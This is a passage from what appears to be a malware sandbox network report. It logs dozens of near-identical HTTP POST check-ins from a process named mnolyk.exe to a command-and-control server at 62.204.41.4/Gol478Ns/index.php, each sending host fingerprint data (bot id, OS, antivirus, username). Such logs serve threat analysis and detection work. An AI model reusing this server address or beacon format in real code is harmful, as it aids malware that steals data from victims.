                                                                      673 | 192.168.2.7 | 50368 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:01.561611891 CET | 788 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:01.627235889 CET | 788 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      674 | 192.168.2.7 | 50369 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:01.812382936 CET | 789 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:01.877387047 CET | 789 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      675 | 192.168.2.7 | 50370 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:02.050257921 CET | 790 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:02.116446972 CET | 790 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      676 | 192.168.2.7 | 50371 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:02.294847965 CET | 791 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:02.357384920 CET | 791 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      677 | 192.168.2.7 | 50372 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:02.525801897 CET | 792 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:02.587749004 CET | 792 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      678 | 192.168.2.7 | 50373 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:02.763122082 CET | 793 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:02.828680038 CET | 793 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      679 | 192.168.2.7 | 50374 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:02.999700069 CET | 794 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:03.064282894 CET | 794 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      68 | 192.168.2.7 | 49763 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:18.271872044 CET | 183 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:18.334903955 CET | 183 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      680 | 192.168.2.7 | 50375 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:03.233760118 CET | 795 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:03.297410011 CET | 795 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      681 | 192.168.2.7 | 50376 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:03.465876102 CET | 796 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:03.528662920 CET | 796 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      682 | 192.168.2.7 | 50377 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:03.701998949 CET | 797 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:03.765979052 CET | 797 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      683 | 192.168.2.7 | 50378 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:03.940155983 CET | 798 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.004148006 CET | 798 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      684 | 192.168.2.7 | 50379 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:04.185148001 CET | 799 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.248972893 CET | 799 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      685 | 192.168.2.7 | 50380 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:04.421525002 CET | 800 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.488599062 CET | 800 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      686 | 192.168.2.7 | 50381 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:04.673243999 CET | 801 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.736589909 CET | 801 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      687 | 192.168.2.7 | 50382 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:04.927710056 CET | 802 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:04.992121935 CET | 802 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      688 | 192.168.2.7 | 50383 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:05.178761959 CET | 803 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:05.245376110 CET | 803 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      689 | 192.168.2.7 | 50384 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:05.420068026 CET | 804 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:05.483033895 CET | 804 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      69 | 192.168.2.7 | 49764 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:18.587959051 CET | 184 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:18.652221918 CET | 184 | IN | HTTP/1.1 200 OK
